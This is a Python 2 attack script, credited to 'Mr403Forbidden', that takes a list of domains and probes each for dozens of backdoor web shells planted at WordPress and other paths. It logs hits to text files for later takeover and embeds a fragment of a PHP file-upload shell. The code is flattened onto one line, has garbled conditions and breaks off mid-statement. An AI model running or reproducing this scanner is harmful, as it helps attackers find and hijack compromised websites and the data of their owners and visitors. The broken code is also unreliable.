# -*-coding:Latin-1 -* import sys , requests, re from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) fr = Fore.RED fc = Fore.CYAN fw = Fore.WHITE fg = Fore.GREEN fm = Fore.MAGENTA print """ ./Mr403Forbidden https://t.me/vicrylaw ]-------------------------------------[ """ shell = """".php_uname()."
"; echo "
"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>""" requests.urllib3.disable_warnings() headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'} try: target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()] except IndexError: path = str(sys.argv[0]).split('\\') exit('\n [!] Enter <' + path[len(path) - 1] + '> ') def URLdomain(site): if site.startswith("http://") : site = site.replace("http://","") elif site.startswith("https://") : site = site.replace("https://","") else : pass pattern = re.compile('(.*)/') while re.findall(pattern,site): sitez = re.findall(pattern,site) site = sitez[0] return site def FourHundredThree(url): try: url = 'http://' + URLdomain(url) check = requests.get(url+'/simple.php',headers=headers, allow_redirects=True,timeout=15) if '{Ninja-Shell}' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('Ninja-Shell.txt', 'a').write(url + '/simple.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url+'/chosen.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'type="button">Upload File<' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('Ninja-Shell.txt', 'a').write(url + '/chosen.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'http://' + URLdomain(url) check = requests.get(url+'/simple.php',headers=headers, allow_redirects=True,timeout=15) if 'Simple File Manage Design by index.php' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('Ninja-Shell.txt', 'a').write(url + '/simple.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url+'/about.php?520',headers=headers, allow_redirects=True,timeout=15) if 'input type="password" name="pass" > {}[Succefully]'.format(fg) open('about.txt', 'a').write(url + '/about.php?520\n') else: url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/about.php?520',headers=headers, allow_redirects=True,timeout=15) if 'input type="password" name="pass" > {}[Succefully]'.format(fg) open('about.txt', 'a').write(url + '/wp-content/about.php?520\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/null/pgon.php',headers=headers, allow_redirects=True,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('pgon.txt', 'a').write(url + '/wp-content/plugins/null/pgon.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/not/up.php',headers=headers, allow_redirects=True,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('up.txt', 'a').write(url + '/wp-content/plugins/not/up.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/pridmag/db.php?u',headers=headers, allow_redirects=True,timeout=15) if 'type="button">Upload<' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('pridmag.txt', 'a').write(url + '/wp-content/themes/pridmag/db.php?u\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,timeout=15) if 'type="button">Upload<' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('seo.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,timeout=15) if 'type="button">Upload<' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('seo.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/fix/up.php',headers=headers, allow_redirects=True,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('up.txt', 'a').write(url + '/wp-content/plugins/fix/up.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/fix/about.php',headers=headers, allow_redirects=True,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('up.txt', 'a').write(url + '/wp-content/plugins/fix/about.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/pwnd/pwnd.php',headers=headers, allow_redirects=True,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('pwnd.txt', 'a').write(url + '/wp-content/plugins/pwnd/pwnd.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/pwnd-1/pwnd.php',headers=headers, allow_redirects=True,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('pwnd-1.txt', 'a').write(url + '/wp-content/plugins/pwnd-1/pwnd.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/pwnd-2/pwnd.php',headers=headers, allow_redirects=True,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('pwnd-2.txt', 'a').write(url + '/wp-content/plugins/pwnd-2/pwnd.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/pwnd-3/pwnd.php',headers=headers, allow_redirects=True,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('pwnd-3.txt', 'a').write(url + '/wp-content/plugins/pwnd-3/pwnd.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/pwnd-4/pwnd.php',headers=headers, allow_redirects=True,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('pwnd-4.txt', 'a').write(url + '/wp-content/plugins/pwnd-4/pwnd.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/pwnd-5/pwnd.php',headers=headers, allow_redirects=True,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('pwnd-5.txt', 'a').write(url + '/wp-content/plugins/pwnd-5/pwnd.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/plugin/class-autoload.php',headers=headers, allow_redirects=True,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('class-autoload.txt', 'a').write(url + '/wp-content/plugins/plugin/class-autoload.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/wordpresss3cll/up.php',headers=headers, allow_redirects=True,timeout=15) if 'type="button">Upload File<' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('up.txt', 'a').write(url + '/wp-content/plugins/wordpresss3cll/up.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/travel/issue.php',headers=headers, allow_redirects=True,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('issue.txt', 'a').write(url + '/wp-content/themes/travel/issue.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/plugins/function.php',headers=headers, allow_redirects=True,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('function.txt', 'a').write(url + '/plugins/function.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/file/function.php',headers=headers, allow_redirects=True,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('function.txt', 'a').write(url + '/file/function.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/as/function.php',headers=headers, allow_redirects=True,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('function.txt', 'a').write(url + '/as/function.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/mah/function.php',headers=headers, allow_redirects=True,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('function.txt', 'a').write(url + '/mah/function.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/admin/function.php',headers=headers, allow_redirects=True,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('function.txt', 'a').write(url + '/admin/function.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/doc/function.php',headers=headers, allow_redirects=True,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('function.txt', 'a').write(url + '/doc/function.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/about/function.php',headers=headers, allow_redirects=True,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('function.txt', 'a').write(url + '/about/function.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/index/function.php',headers=headers, allow_redirects=True,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('function.txt', 'a').write(url + '/index/function.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/too.php',headers=headers, allow_redirects=True,timeout=15) if 'MATTEKUDASAI' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('MATTEKUDASAI.txt', 'a').write(url + '/wp-content/themes/too.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/assets/winnner.php',headers=headers, allow_redirects=True,timeout=15) if 'MATTEKUDASAI' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('MATTEKUDASAI.txt', 'a').write(url + '/wp-includes/assets/winnner.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/go.php',headers=headers, allow_redirects=True,timeout=15) if 'MATTEKUDASAI' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('MATTEKUDASAI.txt', 'a').write(url + '/go.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/seoo/wsoyanz.php',headers=headers, allow_redirects=True,timeout=15) if 'WSO YANZ ENC BYPASS' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('up.txt', 'a').write(url + '/wp-content/plugins/seoo/wsoyanz.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/Cache/Cache.php',headers=headers, allow_redirects=True,timeout=15) if 'WSOX ENC' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('up.txt', 'a').write(url + '/wp-content/plugins/Cache/Cache.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/index.php',headers=headers, allow_redirects=True,timeout=15) if 'L I E R SHELL' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('up.txt', 'a').write(url + '/wp-content/plugins/index.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/yanz.php',headers=headers, allow_redirects=True,timeout=15) if 'type="button">Upload File<' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('yanz.txt', 'a').write(url + '/yanz.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-logout.php',headers=headers, allow_redirects=True,timeout=15) if 'File manager' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-logout.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/_a.php',headers=headers, allow_redirects=True,timeout=15) if 'Shizuo1337' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/_a.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/alfa.php',headers=headers, allow_redirects=True,timeout=15) if 'ALFA TEaM Shell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/alfa.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-delete.php',headers=headers, allow_redirects=True,timeout=15) if 'Quản lý File' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-delete.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-delete1.php',headers=headers, allow_redirects=True,timeout=15) if 'Quản lý File' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-delete1.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-delete2.php',headers=headers, allow_redirects=True,timeout=15) if 'Quản lý File' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-delete2.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-delete3.php',headers=headers, allow_redirects=True,timeout=15) if 'Quản lý File' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-delete3.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-delete4.php',headers=headers, allow_redirects=True,timeout=15) if 'Quản lý File' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-delete4.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/delete1.php',headers=headers, allow_redirects=True,timeout=15) if 'Quản lý File' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/delete1.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/delete2.php',headers=headers, allow_redirects=True,timeout=15) if 'Quản lý File' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/delete2.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/delete3.php',headers=headers, allow_redirects=True,timeout=15) if 'Quản lý File' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/delete3.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/delete4.php',headers=headers, allow_redirects=True,timeout=15) if 'Quản lý File' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/delete4.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-gp.php',headers=headers, allow_redirects=True,timeout=15) if 'Quản lý File' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-gp.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/mini.php',headers=headers, allow_redirects=True,timeout=15) if 'type="button">Upload File<' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/mini.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/dummyyummy/wp-signup.php',headers=headers, allow_redirects=True,timeout=15) if 'Simple Shell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-content/plugins/dummyyummy/wp-signup.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/403.php',headers=headers, allow_redirects=True,timeout=15) if 'KCT MINI SHELL 403' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/403.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/403.php',headers=headers, allow_redirects=True,timeout=15) if 'GrazzMean' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/403.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/marju.php',headers=headers, allow_redirects=True,timeout=15) if 'MARIJUANA' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/marju.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/marjuana.php',headers=headers, allow_redirects=True,timeout=15) if 'MARIJUANA' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/marijuana.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/marjuana.php',headers=headers, allow_redirects=True,timeout=15) if 'MARIJUANA' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/marijuana.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/sitemaps/providers/mariju.php',headers=headers, allow_redirects=True,timeout=15) if 'MARIJUANA' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-includes/sitemaps/providers/mariju.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/css/colors/coffee/mariju.php',headers=headers, allow_redirects=True,timeout=15) if 'MARIJUANA' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-admin/css/colors/coffee/mariju.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/cgi-bin/mariju.php',headers=headers, allow_redirects=True,timeout=15) if 'MARIJUANA' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/cgi-bin/mariju.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/IXR/mariju.php',headers=headers, allow_redirects=True,timeout=15) if 'MARIJUANA' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-includes/IXR/mariju.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/.well-known/acme-challenge/mariju.php',headers=headers, allow_redirects=True,timeout=15) if 'MARIJUANA' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/.well-known/acme-challenge/mariju.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/images/mariju.php',headers=headers, allow_redirects=True,timeout=15) if 'MARIJUANA' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/images/mariju.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/php-compat/mariju.php',headers=headers, allow_redirects=True,timeout=15) if 'MARIJUANA' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-includes/php-compat/mariju.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/maint/mariju.php',headers=headers, allow_redirects=True,timeout=15) if 'MARIJUANA' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-admin/maint/mariju.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/ID3/mariju.php',headers=headers, allow_redirects=True,timeout=15) if 'MARIJUANA' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-includes/ID3/mariju.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/includes/mariju.php',headers=headers, allow_redirects=True,timeout=15) if 'MARIJUANA' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-admin/includes/mariju.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/.well-known/pki-validation/mariju.php',headers=headers, allow_redirects=True,timeout=15) if 'MARIJUANA' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/.well-known/pki-validation/mariju.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/customize/mariju.php',headers=headers, allow_redirects=True,timeout=15) if 'MARIJUANA' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-includes/customize/mariju.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/network/mariju.php',headers=headers, allow_redirects=True,timeout=15) if 'MARIJUANA' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-admin/network/mariju.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/license.php',headers=headers, allow_redirects=True,timeout=15) if '请勿使用非法用途' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/license.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/dummyyummy/wp-signup.php',headers=headers, allow_redirects=True,timeout=15) if 'Simple Shell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/wp-content/plugins/dummyyummy/wp-signup.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/xmrlpc.php?p',headers=headers, allow_redirects=True,timeout=15) if 'Tiny File Manager' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/xmrlpc.php?p\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/tccsh3ll2024.php',headers=headers, allow_redirects=True,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('sb.txt', 'a').write(url + '/tccsh3ll2024.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/packed.php',headers=headers, allow_redirects=True,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('packed.txt', 'a').write(url + '/wp-content/packed.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/bless.php#888xyz999',headers=headers, allow_redirects=True,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('bless.txt', 'a').write(url + '/bless.php#888xyz999\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/css/dist/niil.php',headers=headers, allow_redirects=True,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('niil.txt', 'a').write(url + '/wp-includes/css/dist/niil.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/geju.php',headers=headers, allow_redirects=True,timeout=15) if '-= Team Anon Force =-' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('geju.txt', 'a').write(url + '/geju.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/hoot.php',headers=headers, allow_redirects=True,timeout=15) if '-= Team Anon Force =-' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('geju.txt', 'a').write(url + '/hoot.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp.php',headers=headers, allow_redirects=True,timeout=15) if '-= Team Anon Force =-' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('geju.txt', 'a').write(url + '/wp.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/ayk.php',headers=headers, allow_redirects=True,timeout=15) if '-= Team Anon Force =-' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('geju.txt', 'a').write(url + '/ayk.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/cgi-bin/class_api.php#888xyz999',headers=headers, allow_redirects=True,timeout=15) if '%PDF-0-1
{}[Succefully]'.format(fg) open('classapi.txt', 'a').write(url + '/cgi-bin/class_api.php#888xyz999\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/images/class.api.php#888xyz999',headers=headers, allow_redirects=True,timeout=15) if '%PDF-0-1 {}[Succefully]'.format(fg) open('classapi.txt', 'a').write(url + '/wp-admin/images/class.api.php#888xyz999\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/js/widgets/class.api.php#888xyz999',headers=headers, allow_redirects=True,timeout=15) if '%PDF-0-1 {}[Succefully]'.format(fg) open('classapi.txt', 'a').write(url + '/wp-admin/js/widgets/class.api.php#888xyz999\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/.well-known/pki-validation/class_api.php#888xyz999',headers=headers, allow_redirects=True,timeout=15) if '%PDF-0-1 {}[Succefully]'.format(fg) open('classapi.txt', 'a').write(url + '/.well-known/pki-validation/class_api.php#888xyz999\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/class_api.php#888xyz999',headers=headers, allow_redirects=True,timeout=15) if '%PDF-0-1 {}[Succefully]'.format(fg) open('classapi.txt', 'a').write(url + '/class_api.php#888xyz999\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/class.api.php#888xyz999',headers=headers, allow_redirects=True,timeout=15) if '%PDF-0-1 {}[Succefully]'.format(fg) open('classapi.txt', 'a').write(url + '/class.api.php#888xyz999\n') else: print ' -| ' + url + ' --> 